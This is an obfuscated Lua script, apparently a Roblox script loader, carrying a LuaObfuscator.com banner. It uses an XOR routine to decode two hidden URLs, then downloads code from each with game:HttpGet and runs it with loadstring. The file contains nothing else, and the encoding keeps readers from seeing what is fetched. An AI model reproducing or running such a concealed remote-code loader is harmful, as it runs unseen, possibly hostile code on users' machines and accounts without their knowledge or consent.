--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end spawn(function() loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\207\42\228\178\147\77\134\194\148\22\229\169\206\14\197\208\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\38\177\226\193\28\210\194\222\113\226\233\196\27\129\154\141\33\228\190\158\75\133\148\223\107\234\174\198","\126\177\163\187\69\134\219\167")))();end);loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\202\234\38\223\46\215\245\53\200\103\205\178\44\197\46\139\235\44\223\33\192\238\48\131\46\192\234\108\146\46\152\240\44\204\46\192\238","\156\67\173\74\165")))();
